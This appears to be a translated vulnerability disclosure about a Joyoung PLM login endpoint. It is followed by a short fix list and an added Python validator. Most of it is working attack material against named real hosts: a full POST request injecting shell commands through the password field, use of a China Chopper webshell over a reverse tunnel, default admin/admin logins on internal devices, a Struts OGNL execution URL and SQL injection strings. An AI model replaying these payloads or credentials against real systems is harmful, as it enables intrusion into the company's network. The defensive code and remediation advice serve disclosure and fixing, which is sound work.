Joyoung (9 Yang) intranet roaming caused by a vulnerability (the password parameter also needs to be filtered)

Source: Internet
Author: User

Fix reference: http://wooyun.org/bugs/wooyun-2010-0141195 (this report builds on that earlier vulnerability).

The account parameter has since been filtered; the password parameter still is not.

POST /ease/App/index.php/Public/dologin HTTP/1.1
Host: plmyun.joyoung.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://plmyun.joyoung.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://plmyun.joyoung.com/ease/App/index.php/Public/login
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=gbm15fsjqg8gc7s6ovtdm2uqo6

account=123&password=123%22%26echo '' >  /var/www/cgi-bin/yo.php%26ifconfig%22&wdsl=adw&__hash__=c800b1c5f9c095e463c5fc8c1e4de4d3_15b9ecc9113266ac29e34a08bf0b87b5

Use the new version of China Chopper (caidao, the "kitchen knife" webshell client); the old version does not support HTTPS.

Tunnel: HTTP reverse tunnel.

First, some of the internal systems that were accessed:

#1

1. http://**.**.**/Systeminfo?Vendor=CITRIX&licenseTab=&selected=

Virtualization management console, weak password admin/admin.

#2

https://172.31.1.120/appliance-overview.php

admin/admin

Avocent KVM

Product features: the MergePoint Unity switch integrates KVM over IP and serial console management technology on a single device. This independence
IT administrators can access and control servers, network devices, and other data centers and branch offices.
Complete remote management of devices.

#3

Target: http://**.**.**/ExecuteSQLFileAction.action

Whoami: nt authority\system
WebPath: C:\tomcat\defalut\webapps\ROOT
OS.Name: Windows 2003
OS.Version: 5.2
Java.Home: C:\Program Files\Java\jdk1.6.0_17\jre
Java.Version: 1.6.0_17
OS.arch: x86
User.Name: SYSTEM
User.Home: C:\Documents and Settings\Default User
User.Dir: C:\WINDOWS\system32
Java.Class.Path: C:\tomcat\defalut\bin\bootstrap.jar
Java.IO.Tmpdir: C:\tomcat\defalut\temp

#4

Struts command execution:

http://**.**.**/Jy_admin/security!login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%2F%22%22%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

#5

http://**.**.**/Default.aspx (O&M information platform)

Injection: 1' or '1'='1
123456

http://172.31.0.111/Web/Users/login.asp' and 1=convert(int,(select top 1 Password from Users)) -- 'or'1'='1  09126970585

Solution:

1. Fix the command execution at the login entry point.
2. Fix the common intranet vulnerabilities: SQL injection and Struts command execution.
3. Change the default passwords on the various devices.
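
As an added example for fix 1 (not code from the report or from Joyoung's application): the server-side check that the password parameter lacked, run against the dologin form body captured above, plus the quoting that keeps a credential a single shell argument. The helper path /usr/local/bin/check_login is an assumption, since the report does not show what the login handler executes.

```python
import re
import shlex
from urllib.parse import parse_qs

# Form body of the dologin request quoted in the report (the __hash__ token is omitted).
CAPTURED_BODY = "account=123&password=123%22%26echo '' >  /var/www/cgi-bin/yo.php%26ifconfig%22&wdsl=adw"

# Characters that close a quoted shell argument, chain a command, or redirect output.
SHELL_META = re.compile(r"""[;&|`$<>"'\\\n]""")


def decode_form(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {name: values[0] for name, values in parse_qs(body, keep_blank_values=True).items()}


def flag_shell_metacharacters(fields: dict, checked=("account", "password")) -> list:
    """Return the checked login fields whose decoded value carries shell metacharacters.

    This is the filter the report says the account parameter got and the password
    parameter lacks. It is only a stop-gap: a handler that feeds credentials to a
    shell stays fragile, and the fix is to stop building a command string at all.
    """
    return [name for name in checked if name in fields and SHELL_META.search(fields[name])]


def hardened_command(account: str, password: str, helper: str = "/usr/local/bin/check_login") -> str:
    """Quote each credential so the helper receives it as exactly one argument.

    `helper` is a hypothetical path; the report does not show what dologin invokes.
    Preferable still is subprocess.run([helper, account, password]) with shell=False,
    which never involves a shell; shlex.quote is for code that must keep a string.
    """
    return " ".join([helper, shlex.quote(account), shlex.quote(password)])


if __name__ == "__main__":
    fields = decode_form(CAPTURED_BODY)
    print("decoded password field:", fields["password"])
    print("fields with shell metacharacters:", flag_shell_metacharacters(fields))
    argv = shlex.split(hardened_command(fields["account"], fields["password"]))
    print("argument count after quoting:", len(argv))  # 3: the payload stays one argument
```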
 
